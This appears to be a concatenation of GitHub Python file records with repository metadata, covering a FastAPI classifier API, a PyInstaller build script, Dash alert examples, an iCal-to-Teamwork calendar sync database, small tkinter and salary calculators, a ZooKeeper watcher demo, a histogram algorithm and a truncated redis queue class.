2)\n","repo_name":"Krishnaarunangsu/XpressoArunangsu","sub_path":"src/as_1.py","file_name":"as_1.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42662776873","text":"from fastapi import FastAPI\nfrom fastapi import File\nfrom fastapi import Form\nfrom fastapi import UploadFile\nfrom fastapi.responses import JSONResponse\nfrom app.utils import *\nimport uvicorn\n\napp = FastAPI()\n\n@app.post('/image')\nasync def image_post(\n image: UploadFile = File(...)\n):\n prediction, probas, classes = classify_image(image)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\n@app.post('/text')\nasync def text_post(\n text: str = Form(...)\n):\n prediction, probas, classes = classify_text(text)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\n@app.post('/combined')\nasync def combined_post(\n image: UploadFile = File(...),\n text: str = Form(...)\n):\n prediction, probas, classes = classify_combined(image, text)\n return JSONResponse(status_code=200, content={'prediction': prediction, 'probs': probas, 'classes': classes})\n\nif __name__ == '__main__':\n uvicorn.run('api:app', host='0.0.0.0', port=8080, reload=True)","repo_name":"abuhasan12/Facebook-Marketplace-s-Recommendation-Ranking-System","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"42289275754","text":"import os\nimport sys\nfrom shutil import copytree, rmtree, copy\nimport platform\n\ndirname = os.path.abspath(os.path.dirname(__file__))\ntemplatepath_name = \"n42Templates\"\nbasespectra_name = \"baseSpectra\"\nbuildpath = os.path.join(dirname, \"build\")\ndistpath = os.path.join(dirname, \"dist\")\n\nif not os.path.exists(distpath):\n os.makedirs(distpath)\n\n# Ensure latest ui\nr = os.system(sys.executable + \" build-ui.py\")\nif r: exit(r)\n\n# Ensure documentation is compiled\nr = os.system(f\"sphinx-build -M html \\\"{os.path.join(dirname, 'doc')}\\\" \\\"{os.path.join(dirname, 'doc', '_build')}\\\"\")\nif r: exit(r)\n\n# Main RASE app\noptions = \"--onedir --windowed\" if platform.system() == \"Darwin\" else \"\"\nr = os.system(sys.executable + \" -m PyInstaller -a -y \" + options +\n \" --distpath \" + distpath +\n \" --workpath \" + buildpath +\n \" rase.spec\")\nif r: exit(r)\n\n# Templates and base spectra\nfor source_name in (templatepath_name, basespectra_name):\n destination_path = os.path.join(distpath, source_name)\n rmtree(destination_path, ignore_errors=True)\n copytree(os.path.join(dirname, source_name), destination_path)\n\n# tools\ntools_path = os.path.join(distpath, \"ReplayTools\")\nrmtree(tools_path, ignore_errors=True)\nos.makedirs(tools_path)\ncopy(os.path.join(dirname, \"tools\", \"FLIR-R440-ReplayTool-Wrapper.cmd\"), tools_path)\n\n# demo replay tool\nr = os.system(sys.executable + \" -m PyInstaller -a -y -F --noupx\" +\n \" --distpath \" + os.path.join(distpath, 'ReplayTools') +\n \" --workpath \" + buildpath + \" \" +\n os.path.join(dirname, \"tools\",\"demo_replay.py\"))\nif r: exit(r)\n\n# Translators\nr = os.system(sys.executable + \" \" + os.path.join(dirname, \"translators\", \"create_translators_exe.py\"))\nif r: exit(r)\n\nif platform.system() == \"Darwin\":\n import dmgbuild\n print(\"Creating App Bundle\")\n translators_path = os.path.join(dirname, 'translators', 'dist')\n dmgbuild.build_dmg(volume_name=\"RASE\",\n filename=os.path.join(distpath, \"rase.dmg\"),\n settings_file=\"dmgbuild_settings.py\",\n settings={'files': [os.path.join(distpath, 'rase.app'),\n translators_path,\n tools_path,\n templatepath_name,\n basespectra_name]},\n )\n","repo_name":"LLNL/RASE","sub_path":"create_distributable.py","file_name":"create_distributable.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"11786357087","text":"import dash_bootstrap_components as dbc\nfrom dash import html\n\nalerts = html.Div(\n [\n dbc.Alert(\n [\n html.I(className=\"bi bi-info-circle-fill me-2\"),\n \"An example info alert with an icon\",\n ],\n color=\"info\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-check-circle-fill me-2\"),\n \"An example success alert with an icon\",\n ],\n color=\"success\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-exclamation-triangle-fill me-2\"),\n \"An example warning alert with an icon\",\n ],\n color=\"warning\",\n className=\"d-flex align-items-center\",\n ),\n dbc.Alert(\n [\n html.I(className=\"bi bi-x-octagon-fill me-2\"),\n \"An example danger alert with an icon\",\n ],\n color=\"danger\",\n className=\"d-flex align-items-center\",\n ),\n ]\n)\n","repo_name":"facultyai/dash-bootstrap-components","sub_path":"docs/components_page/components/alert/icon.py","file_name":"icon.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":1025,"dataset":"github-code","pt":"44"} +{"seq_id":"39397625454","text":"from support import version, icalparser\nfrom support.tw_logging import log\n__author__ = version.get_author()\n__version__ = version.get_version()\n\nfrom random import randint\nimport sqlite3, logging, time\nimport requests.exceptions, logging\n\n\n'''\nClass: icalObject\nDescription: wraps parsed ical data for easier implementation\n'''\n\n\nclass parentObject():\n def __init__(self, parent):\n self.__parent = parent\n def get_id(self):\n try:\n return self.__parent[0]\n except TypeError:\n return self.__parent\n def get_project_id(self):\n try:\n return self.__parent[1]\n except TypeError:\n return self.__parent\n def get_ical_link(self):\n try:\n return self.__parent[2]\n except TypeError:\n return self.__parent\n def get_event_id(self):\n try:\n return self.__parent[3]\n except TypeError:\n return self.__parent\n def get_event_name(self):\n try:\n return self.__parent[4]\n except TypeError:\n return self.__parent\n def get_last_sync(self):\n try:\n return self.__parent[5]\n except TypeError:\n return self.__parent\n\nclass icalObject(parentObject):\n def __init__(self, listing, cutoff):\n parentObject.__init__(self,listing)\n self.__listing = listing\n self.__cutoff = cutoff\n self.__parser = None\n def generate(self):\n self.__parser = icalparser.Connect(self.get_ical_link())\n return -1\n def get_type(self):\n return self.__parser.get_type()\n def get_events(self):\n if self.__parser == None:\n self.generate()\n events = self.__parser.get_to_date(self.__cutoff)\n out_list = list()\n for event in events:\n out_list.append(entry_icalObject(event))\n return out_list\n\n'''\nClass: entryObject\nDescription: wraps entry object from database for easier access.\n'''\n\nclass entryObject():\n def __init__(self, entry):\n self.__entry = entry\n\n def get_ical_id(self):\n return self.__entry[0]\n @property\n def ical_id(self):\n return self.get_ical_id()\n\n def get_start(self):\n return self.__entry[1]\n @property\n def start(self):\n return self.get_start()\n\n def get_end(self):\n return self.__entry[2]\n @property\n def end(self):\n return self.get_end()\n\n def get_amount(self):\n return self.__entry[3]\n @property\n def amount(self):\n return self.get_amount()\n\n def get_guest(self):\n return self.__entry[4]\n @property\n def guest(self):\n return self.get_guest()\n\n def get_service(self):\n return self.__entry[5]\n @property\n def service(self):\n return self.get_service()\n\n def get_email(self):\n return self.__entry[6]\n @property\n def email(self):\n return self.get_email()\n\n def get_phone(self):\n return self.__entry[7]\n @property\n def phone(self):\n return self.get_phone()\n\n def get_posted(self):\n return self.__entry[8]\n @property\n def posted(self):\n return self.get_posted()\n\n def get_delete(self):\n return self.__entry[9]\n @property\n def delete(self):\n return self.get_delete()\n\n def get_post_id(self):\n return self.__entry[10]\n @property\n def post_id(self):\n return self.get_post_id()\n\n def get_entry_id(self):\n return self.__entry[11]\n @property\n def entry_id(self):\n return self.get_entry_id()\n\n def get_cleaning_entry(self):\n return self.__entry[12]\n @property\n def cleaning_entry(self):\n return self.get_cleaning_entry()\n\n def set_remove_log(self, operation):\n try:\n self.__remove += operation\n except AttributeError:\n self.__remove = 0\n self.__remove += 1\n def get_remove_log(self):\n try:\n return self.__remove\n except AttributeError:\n return -1\n\n'''\nClass: entryparentObject\nDescription: Adds parent data to entryObject class\n'''\n\n\nclass entryparentObject(entryObject):\n def __init__(self, entry, parent):\n entryObject.__init__(self, entry)\n self.__parent = parent\n def get_project_id(self):\n try:\n return self.__parent[1]\n except TypeError:\n return self.__parent\n def get_event_id(self):\n try:\n return self.__parent[3]\n except TypeError:\n return self.__parent\n def get_event_name(self):\n try:\n return self.__parent[4]\n except TypeError:\n return self.__parent\n def get_last_sync(self):\n try:\n return self.__parent[5]\n except TypeError:\n return self.__parent\n\n\n\n'''\nClass: entry_icalObject\nDescription: Wraps individual ical entry for easier manipulation.\n'''\n\nclass entry_icalObject():\n def __init__(self, entry_candidate):\n self.__entry = entry_candidate\n def get_start(self):\n return self.__entry['start']\n def get_end(self):\n return self.__entry['end']\n def get_guest(self):\n return self.__entry['guest']\n def get_phone(self):\n try:\n return self.__entry['phone']\n except KeyError:\n return ''\n def get_email(self):\n try:\n return self.__entry['email']\n except KeyError:\n return ''\n def get_amount(self):\n return 0\n\nclass MainFile():\n def __init__(self, db_file):\n self.__db_file = db_file\n self.__conn = sqlite3.connect(db_file)\n self.__c = self.__conn.cursor()\n\n def save(self):\n self.__conn.commit()\n\n def close(self):\n self.__conn.close()\n\n def testdb(self):\n valid_db = ['config', 'listings', 'entries']\n test_db = list()\n for table_name in self.__c.execute(\"SELECT name FROM sqlite_master WHERE type='table'\"):\n for table in table_name:\n test_db.append(table)\n\n if valid_db == test_db:\n return 1\n else:\n return -1\n\n def get_from_config(self, idx):\n try:\n config = str()\n for client_data in self.__c.execute('SELECT * FROM config'):\n config = client_data[idx]\n if config == str():\n return -1\n else:\n return config\n except sqlite3.OperationalError:\n return -1\n\n def get_company_id(self):\n return self.get_from_config(0)\n\n def get_cutoff(self):\n return self.get_from_config(1)\n\n def get_cleaning_event(self):\n return self.get_from_config(2)\n\n def set_company_id_cutoff_cleaning(self, company_id, cutoff, cleaning_event):\n cur_id = self.get_company_id()\n if cur_id == -1:\n self.__c.execute(\"INSERT INTO config VALUES ('{}', '{}', '{}')\".format(company_id, cutoff, cleaning_event))\n return 1\n else:\n return -1\n\n def get_listings(self):\n out_list = list()\n for listing in self.__c.execute(\"SELECT * FROM listings\"):\n out_list.append(listing)\n return out_list\n\n def get_listings_objects(self):\n listings = self.get_listings()\n out_list = list()\n for listing in listings:\n out_list.append(parentObject(listing))\n return out_list\n\n def iter_listings(self):\n for listing in self.__c.execute(\"SELECT * FROM listings\"):\n yield listing\n\n def iter_entries(self):\n for entry in self.__c.execute(\"SELECT * FROM entries\"):\n yield entry\n\n def get_listing(self, id, idx=0):\n out_listing = None\n for listing in self.iter_listings():\n if listing[idx] == id:\n out_listing = listing\n if out_listing != None:\n return out_listing\n else:\n return -1\n\n def get_entries(self):\n out_list = list()\n for entry in self.iter_entries():\n out_list.append(entry)\n return out_list\n def get_entries_listing(self, id):\n entries = self.get_entries()\n out_list = list()\n for entry in entries:\n if id == entry[0]:\n entry_parent = self.get_listing(entry[0])\n out_list.append(entryparentObject(entry, entry_parent))\n return out_list\n def iter_entries_objects(self):\n for entry in self.iter_entries():\n yield entryObject(entry)\n def stay_duration_calc(self, start, end):\n return -1\n def get_entries_parent_objects(self):\n out_list = list()\n entries = self.get_entries()\n for entry in entries:\n entry_parent = self.get_listing(entry[0])\n out_list.append(entryparentObject(entry, entry_parent))\n return out_list\n\n def get_pending_entries(self):\n out_list_add = list()\n out_list_rem = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_delete() == 1:\n out_list_rem.append(entry)\n elif entry.get_posted() == 0:\n out_list_add.append(entry)\n return out_list_add,out_list_rem\n\n def get_pending_cleaning_entries(self):\n out_list_add = list()\n out_list_rem = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_delete() == 1 and entry.get_cleaning_entry() != '':\n out_list_rem.append(entry)\n elif entry.get_delete() == 1 and entry.get_post_id() == -1:\n out_list_rem.append(entry)\n elif entry.get_posted() == 1 and entry.get_cleaning_entry() == '':\n out_list_add.append(entry)\n return out_list_add, out_list_rem\n\n def get_posted_entries(self):\n out_list = list()\n entries = self.get_entries_parent_objects()\n for entry in entries:\n if entry.get_posted() == 1:\n out_list.append(entry)\n return out_list\n\n def get_ical_present(self, ical_link, idx=1):\n present = False\n for ical_check in self.iter_listings():\n if ical_check[idx] == ical_link: present = True\n return present\n\n def get_entry_present(self, entry_test, parent_ical):\n parentId = parent_ical.get_id()\n present = 0\n for entry in self.iter_entries():\n entry_obj = entryObject(entry)\n if entry_obj.get_ical_id() == parentId:\n if entry_test.get_start() == entry_obj.get_start() and entry_test.get_end() == entry_obj.get_end() and entry_test.get_guest() == entry_obj.get_guest():\n present += 1\n if present == 1:\n return True\n elif present == 0:\n return False\n\n def append_entry(self, entry, parent_ical, id = None):\n ical_id = parent_ical.get_id()\n start_date = entry.get_start()\n leave_date = entry.get_end()\n amount = entry.get_amount()\n guest = entry.get_guest()\n service = parent_ical.get_type()\n email = entry.get_email()\n phone = entry.get_phone()\n if id == None:\n entry_id = self.get_unique_random_entry()\n else:\n entry_id = id\n print('ICAL_ID = {} S = {} E = {}'.format(ical_id, start_date, leave_date))\n try:\n self.__c.execute(\"INSERT INTO entries VALUES ('{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}')\".format(ical_id, start_date, leave_date, amount, guest, service, email, phone, 0, 0, '', entry_id, ''))\n except sqlite3.OperationalError:\n log.warning(\"Entry Skipped\", \"Entry with title - {} - has been skipped\".format(guest))\n logging.info(\"Skipping:\\n Name: {}\".format(guest))\n print('skipping')\n def set_mark_remove(self, entry, remove_step = 1):\n params = (remove_step, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET \"delete\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def remove_entry(self, entry):\n params = entry.get_entry_id()\n self.__c.execute(\"DELETE FROM entries WHERE \\\"entry id\\\" = '{}'\".format(params))\n logging.info(\"Entry '{}' removed from calendar database\".format(entry.get_entry_id()))\n self.save()\n return -1\n\n def remove_listing(self, ical_id):\n self.__c.execute(\"DELETE FROM listings WHERE \\\"ical id\\\" = '{}'\".format(ical_id))\n logging.info(\"Listing id '{}' removed from calendar database\".format(ical_id))\n self.save()\n return -1\n\n def get_pending_teamwork_actions(self):\n pending_additions = 0\n pending_removals = 0\n for entry in self.iter_entries_objects():\n if entry.get_delete() == 1:\n pending_removals += 1\n if entry.get_posted() == 0:\n pending_additions += 1\n return pending_additions, pending_removals\n\n def update_entry_id(self, entry, id):\n params = (id, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET posted = 1 ,\n \"post id\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def update_entry_cleaning_id(self, entry, id):\n params = (id, entry.get_entry_id())\n sql = ''' UPDATE entries\n SET \"cleaning id\" = ?\n WHERE \"entry id\" = ?'''\n self.__c.execute(sql, params)\n return -1\n\n def set_listing_last_sync(self, listingobj):\n params = (time.time(), listingobj.get_id())\n sql = ''' UPDATE listings\n SET \"last sync\" = ?\n WHERE \"ical id\" = ?'''\n self.__c.execute(sql, params)\n self.save()\n return -1\n\n def sync_icals(self):\n listings = self.get_listings()\n entries = self.get_entries_parent_objects()\n for listing in listings:\n ical_listing = icalObject(listing, self.get_cutoff())\n ical_events = ical_listing.get_events()\n print(ical_events)\n logging.debug('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n logging.debug(listing[2])\n logging.debug(ical_events)\n logging.debug('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')\n if ical_events != list():\n for ical_event in ical_events:\n for entry in entries:\n if entry.get_guest() == ical_event.get_guest() and entry.get_start() == ical_event.get_start() and entry.get_end() == ical_event.get_end() and ical_listing.get_id() == entry.get_ical_id():\n entry.set_remove_log(1)\n if not self.get_entry_present(ical_event, ical_listing):\n self.append_entry(ical_event, ical_listing)\n for entry in entries:\n if entry.get_remove_log() == -1:\n logging.info(\"No match found in ical for '{}'. Set to remove from teamwork.\".format(entry.get_entry_id()))\n self.set_mark_remove(entry)\n self.save()\n def sync_listing_ical(self, listingobj):\n listing = self.get_listing(listingobj.get_id())\n ical_object = icalObject(listing, self.get_cutoff())\n try:\n ical_events = ical_object.get_events()\n except requests.ConnectionError:\n exit()\n entries = self.get_entries_listing(listingobj.get_id())\n logging.info(\"Listing '{}' Listing ID '{}'\".format(ical_object.get_event_name(), ical_object.get_id()))\n out_value = 0\n if ical_events != []:\n for ical_event in ical_events:\n for entry in entries:\n if entry.get_guest() == ical_event.get_guest()\\\n and entry.get_start() == ical_event.get_start() \\\n and entry.get_end() == ical_event.get_end() \\\n and ical_object.get_id() == entry.get_ical_id():\n entry.set_remove_log(1)\n if not self.get_entry_present(ical_event, ical_object):\n self.append_entry(ical_event, ical_object)\n self.save()\n out_value = 1\n for entry in entries:\n if entry.get_remove_log() == -1:\n logging.info(\"No match found in ical for '{}'. Set to remove from teamwork.\".format(entry.get_entry_id()))\n self.set_mark_remove(entry)\n self.set_mark_remove(entry)\n self.set_listing_last_sync(listingobj)\n return out_value == 1\n def sync_teamwork(self, teamwork):\n pending_entries_add, pending_entries_remove = self.get_pending_entries()\n for entry in pending_entries_add:\n post_id = teamwork.post_calendarevent(entry)\n print(post_id)\n if not post_id:\n logging.warning(\"'{}' - Failed to upload to teamwork.\".format(entry.get_entry_id()))\n continue\n else:\n logging.info(\"'{}' - Upload to teamwork with the posting id '{}'\".format(entry.get_entry_id(), post_id))\n self.update_entry_id(entry, post_id)\n pending_entries_cleaning_add, pending_entries_cleaning_remove = self.get_pending_cleaning_entries()\n for entry in pending_entries_cleaning_add:\n start = entry.get_end()\n end = entry.get_end()\n title = '{} - Cleaning'.format(entry.get_event_name())\n description = ''\n where = entry.get_event_name()\n project_id = entry.get_project_id()\n event_id = self.get_cleaning_event()\n post_id = teamwork.post_calendarevent_cleaning(start=start,end=end,title=title,description=description,\n where=where,project_id=project_id, event_id=event_id)\n if not post_id:\n logging.warning(\"'{}' - Cleaning event failed to upload to teamwork.\".format(entry.get_entry_id()))\n else:\n self.update_entry_cleaning_id(entry, post_id)\n self.save()\n for entry in pending_entries_cleaning_remove:\n if entry.get_cleaning_entry() != -1:\n remove_status = teamwork.remove_calendarevent(entry.get_cleaning_entry())\n if remove_status == 1:\n self.update_entry_cleaning_id(entry, -1)\n elif remove_status == -1:\n logging.warning(\"'{}' - Cleaning event failed to remove from teamwork\".format(self.get_cleaning_event()))\n for entry in pending_entries_remove:\n if entry.get_post_id() != -1:\n remove_status = teamwork.remove_calendarevent(entry.get_post_id())\n if remove_status == 1:\n self.update_entry_id(entry,-1)\n elif entry.get_post_id() == -1:\n remove_status = 1\n if remove_status == 1 and entry.get_cleaning_entry() == -1:\n self.remove_entry(entry)\n self.save()\n return -1\n\n def remove_all_posted(self, teamwork):\n posted_entries = self.get_posted_entries()\n for entry in posted_entries:\n if entry.get_cleaning_entry() != '' and entry.get_cleaning_entry() != -1:\n cleaning_remove_status = teamwork.remove_calendarevent(entry.get_cleaning_entry())\n else:\n cleaning_remove_status = 1\n if cleaning_remove_status == 1:\n self.update_entry_cleaning_id(entry, -1)\n remove_status = teamwork.remove_calendarevent(entry.get_post_id())\n else:\n remove_status = -1\n if remove_status == 1:\n self.remove_entry(entry)\n return -1\n\n def get_unique_random(self):\n numgen = randgen()\n match = True\n listings = self.get_listings()\n id = numgen.generate()\n while match:\n id = numgen.generate()\n count_match = 0\n for listing in listings:\n if id == listing[0]:\n count_match += 1\n if count_match == 0:\n match = False\n return id\n\n def get_unique_random_entry(self):\n numgen = randgen()\n match = True\n entries = self.get_entries()\n id = numgen.threegen()\n while match:\n id = numgen.threegen()\n count_match = 0\n for entry in entries:\n if id == entry[11]:\n count_match += 1\n if count_match == 0:\n match = False\n return id\n\n def append_ical(self, ical_link, project_id, event_id, event_name):\n if not self.get_ical_present(ical_link):\n unique_id = self.get_unique_random()\n self.__c.execute(\"INSERT INTO listings VALUES ('{}','{}','{}','{}','{}', '{}')\".format(unique_id,project_id,ical_link,event_id,event_name,0))\n return 1\n else:\n return -1\n\nclass randgen():\n def __init__(self):\n self.__alph = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',1,2,3,4,5,6,7,8,9]\n self.__alphlen = self.__alph.__len__() - 1\n def generate(self):\n int1 = randint(0, self.__alphlen)\n int2 = randint(0, self.__alphlen)\n return '{}{}'.format(self.__alph[int1], self.__alph[int2])\n def threegen(self):\n int1 = randint(0, self.__alphlen)\n int2 = randint(0, self.__alphlen)\n int3 = randint(0, self.__alphlen)\n return '{}{}{}'.format(self.__alph[int1], self.__alph[int2], self.__alph[int3])\n\ndef createdb(file_name, company_id=98287, start_week=2, cleaning_event=106880):\n time_offset = start_week * 24 * 60 * 60 * 7\n cutoff_date = int(time.time()) - time_offset\n conn = sqlite3.connect(file_name)\n c = conn.cursor()\n c.execute('''CREATE TABLE config\n ('company_id' id, 'cutoff_date' date, 'cleaning event type' id )''')\n c.execute('''CREATE TABLE listings\n ('ical id' id, 'project id' id, 'ical link' text, 'event id' id, 'event name' text, 'last sync' date)''')\n c.execute('''CREATE TABLE entries\n ('ical id' id, 'arrival date' date, 'leave date' date, 'amount' money, 'guest' name, 'service' int, 'email' name, 'phone' text, 'posted' BIT, 'delete' BYTE, 'post id' id, 'entry id' id, 'cleaning id' id)''')\n conn.commit()\n conn.close()\n new_file = MainFile(file_name)\n new_file.set_company_id_cutoff_cleaning(company_id, cutoff_date, cleaning_event)\n new_file.save()\n return new_file\n\ndef testdb(file_name):\n test_file = MainFile(file_name)\n return test_file.testdb()\n\nif __name__ == \"__main__\":\n test_db = \"calendar.db\"\n db = MainFile(test_db)","repo_name":"greasysock/bnbCalendar","sub_path":"support/calendardb.py","file_name":"calendardb.py","file_ext":"py","file_size_in_byte":23028,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"7716701732","text":"'''\r\nWrite a Desktop Python program to get first \r\nand last name from user to display full name \r\nto user.\r\n'''\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\n\r\ndef calculate_cube():\r\n try:\r\n # Get the number from the entry widget\r\n num = float(entry.get())\r\n \r\n # Calculate the cube of the number\r\n cube = num ** 3\r\n \r\n # Display the result\r\n result_label.config(text=f\"Cube of {num} is: {cube}\")\r\n except ValueError:\r\n # Show an error message if the input is not a valid number\r\n messagebox.showerror(\"Error\", \"Please enter a valid number!\")\r\n\r\nif __name__==\"__main__\":\r\n\t# Create the main window\r\n\troot = tk.Tk()\r\n\troot.title(\"Cube Calculator\")\r\n\r\n\t# Label to prompt the user\r\n\tprompt_label = tk.Label(root, text=\"Enter a number:\")\r\n\tprompt_label.pack(pady=10)\r\n\r\n\t# Entry widget for user input\r\n\tentry = tk.Entry(root)\r\n\tentry.pack(pady=10)\r\n\r\n\t# Button to trigger the calculation\r\n\tcalc_button = tk.Button(root, text=\"Calculate Cube\", command=calculate_cube)\r\n\tcalc_button.pack(pady=10)\r\n\r\n\t# Label to display the result\r\n\tresult_label = tk.Label(root, text=\"\")\r\n\tresult_label.pack(pady=10)\r\n\r\n\t# Run the application\r\n\troot.mainloop()\r\n\r\n","repo_name":"alexandercooper97/300-Python-Exercises","sub_path":"02_Intermediate/Problem_188/assignment_188.py","file_name":"assignment_188.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72329780292","text":"\r\nimport time\r\n\r\nhrs=float(input('Quantos voce ganha por hora ?'))\r\nhrspordia=float(input('Quantas horas trabalhado por mês ?'))\r\n\r\nsalarioSemHrsExtras = hrs * hrspordia\r\nprint(f'salario sem hrs extras: {salarioSemHrsExtras:,.2f}')\r\n\r\n\r\nhrsExtras = float(input('Quantas horas extras fez por mês sem adicional noturno ?'))\r\n\r\ncomHrsExtras = hrsExtras + (hrsExtras*25/100)\r\nsalarioComHrsExtras = salarioSemHrsExtras + (hrs * comHrsExtras)\r\nprint(f'salario bruto com horas extras: {salarioComHrsExtras:,.2f}')\r\n\r\nadicionalNoturno = input('teve adicional noturno sim/nao: ')\r\nif adicionalNoturno == 'sim' and 'Sim':\r\n hrsExtrasAdicionalNoturno = float(input('Quantas hrs adicional noturno fez por mes ?'))\r\n ComAdicionalNoturno = hrsExtrasAdicionalNoturno + (hrsExtrasAdicionalNoturno*25/100)\r\n salarioComAdicionalNoturno = ComAdicionalNoturno + (ComAdicionalNoturno * hrs)\r\n salarioComAdicionalNoturno = salarioComAdicionalNoturno + salarioComHrsExtras\r\n print(f'Salario bruto com adicional noturno: {salarioComAdicionalNoturno:,.2f}')\r\nelse:\r\n print('fim')\r\ntime.sleep(10)","repo_name":"danielnakaharaa/salario.github.io","sub_path":"salario (3).py","file_name":"salario (3).py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70569677252","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport time\nfrom kazoo.client import KazooClient\nfrom kazoo.client import ChildrenWatch\nfrom kazoo.client import DataWatch\n\n\"\"\"\nWatcher可以通过两种方式设置,一种是在调用ZK客户端方法的时候传递进去,比如 zk.get_children(\"/node\", watch=FUN),但是这种方法是一次性的\n也就是触���一次就没了,如果你还想继续监听一个事件就需要再次注册。\n另外一种方法是通过高级API实现,监控数据或者节点变化,它只需要我们注册一次。一次性事件关注是zookeeper默认的即便在JAVA客户端里也是,这种高级别\nAPI在JAVA里是zkclient,而在Python里面就是kazoo。高级API其实是对低级API的封装,对用户来讲更加好用。\n\"\"\"\n\n__metaclass__ = type\n\n\nclass zkWatcherTest:\n\n def __init__(self, host, port, timeout=10):\n self._nodename = ''\n self._host = host\n self._port = port\n self._timeout = timeout\n self._zk = KazooClient(hosts=self._host + ':' + self._port, timeout=self._timeout)\n self._zk.start()\n self._lastNodeList = []\n\n def start(self, zkPath):\n self._lastNodeList = self._zk.get_children(zkPath)\n try:\n ChildrenWatch(client=self._zk, path=zkPath, func=self._NodeChange)\n\n DataWatch(client=self._zk, path=zkPath, func=self._DataChange)\n # 这里的死循环就是为了不让程序退出,你可以把时间设置长一点观察,其实即便没有到60秒的睡眠时间,如果\n # 子节点或者节点数量发生变化也会收到通知。这里的wathch底层就是在节点上设置监听器,然后捕捉事件,如果有\n # 事件触发就调用你传递的方法来处理。\n while True:\n time.sleep(60)\n print\n \"OK\"\n except Exception as err:\n print\n err.message\n\n def _NodeChange(self, children):\n \"\"\"\n 处理子节点变化\n :param children: 这个参数并不需要你传递进来,因为把这个方法传递进ChiledrenWatcher,会返回一个当前子节点列表\n :return:\n \"\"\"\n # print children\n # 如果新节点列表长度大于上次获取的节点列表长度,说明有增加\n if len(children) > len(self._lastNodeList):\n for node in children:\n if node not in self._lastNodeList:\n print\n \"新增加的节点为:\", str(node)\n self._lastNodeList = children\n else:\n for node in self._lastNodeList:\n if node not in children:\n print\n \"删除的节点为:\", str(node)\n self._lastNodeList = children\n\n def _DataChange(self, data, stat):\n \"\"\"\n 处理节点的数据变化\n :param data:\n :param stat:\n :return:\n \"\"\"\n print\n \"数据发生变化\"\n print\n \"数据为:\", data\n print\n \"数据长度:\", stat.dataLength\n print\n \"数据版本号version:\", stat.version\n print\n \"cversion:\", stat.cversion\n print\n \"子节点数量:\", stat.numChildren\n\n\ndef main():\n try:\n zkwt = zkWatcherTest(host=\"127.0.0.1\", port=\"2181\")\n zkwt.start(\"/zktest\")\n except Exception as err:\n print\n err.message\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n sys.exit()","repo_name":"youngzil/quickstart-python","sub_path":"src/zookeeper/example/zkWatcherTest.py","file_name":"zkWatcherTest.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18567817408","text":"from collections import deque\n\n\nclass Solution:\n def largestRectangleArea(self, heights) -> int:\n n = len(heights)\n\n def leftsmaller(nums):\n stack = deque()\n res = []\n for i, val in enumerate(nums):\n while stack and val <= stack[-1][1]:\n stack.pop()\n if not stack:\n res.append(-1)\n else:\n res.append(stack[-1][0])\n stack.append((i, val))\n return res\n\n def rightsmaller(nums):\n stack = deque()\n res = []\n for i in range(len(nums)-1, -1, -1):\n while stack and nums[i] <= stack[-1][1]:\n stack.pop()\n if not stack:\n res.append(n)\n else:\n res.append(stack[-1][0])\n stack.append((i, nums[i]))\n return res[::-1]\n\n l, r = leftsmaller(heights), rightsmaller(heights)\n res = 0\n for i in range(n):\n res = max(res, (r[i]-l[i]-1)*heights[i])\n return res\n","repo_name":"richiabhi/PlacementPreparationModule","sub_path":"Day14/largestHistogram.py","file_name":"largestHistogram.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5656689056","text":"#-*- coding: utf-8 -*-\n#\n# A cross-platform Mssage queue based redis\n#\nfrom gevent import monkey\nmonkey.patch_all()\nimport redis\nimport Config as cfg\n\n\nclass MessageQueue:\n def __init__(self, db=0, priority='p5'):\n self._queue = redis.StrictRedis(host=cfg.REDIS_ADDR,\n port=cfg.REDIS_PORT,\n db=0)\n self._priority = priority\n\n def get_priority(self) -> str:\n return self._priority\n\n def put(self, value):\n if not isinstance(value, str):\n raise RuntimeError(\"Must be a str type to put the queue of redis\")\n self._queue.lpush(self._priority, value)\n\n def get(self, block=True, encoding='utf-8'):\n if block:\n v = self._queue.brpop(self._priority)\n else:\n v = self._queue.rpop(self._priority)\n\n if v is None:\n return None\n else:\n _, v = v\n if encoding:\n v = str(v, 